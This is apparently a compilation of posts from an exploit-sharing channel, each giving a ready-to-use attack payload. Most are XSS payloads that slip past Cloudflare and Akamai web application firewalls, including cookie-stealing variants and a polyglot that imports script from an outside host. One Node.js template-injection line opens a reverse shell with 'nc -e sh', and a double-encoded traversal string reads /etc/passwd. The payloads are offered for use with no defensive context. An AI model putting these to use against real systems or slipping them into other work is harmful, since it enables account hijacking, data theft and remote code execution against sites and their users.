XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

XSS could be be triggers in url itself, no need for parameter injection ⚡️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

If you discover a node.js template area, you should try triggerable node payload 🔥; require('child_process').exec('nc -e sh ip port');{src:/bin/sh/}

so you can get RCE 💎

#rce #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

short XSS polyglot

'/*\'/*"/*\"/*</Script>
<Input/AutoFocus/OnFocus=/**/
(import(/https:\\X55.is/.source))//>

#Xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Stored XSS via cache poisoning ⚡️

"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Directory Traversal Bypass Payload ⚡️

/../../etc/passwd - 403 Forbidden 🚫

%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅

#Bypass #Payload
——————‌
@Learnexploit
@A3l3_KA4 💎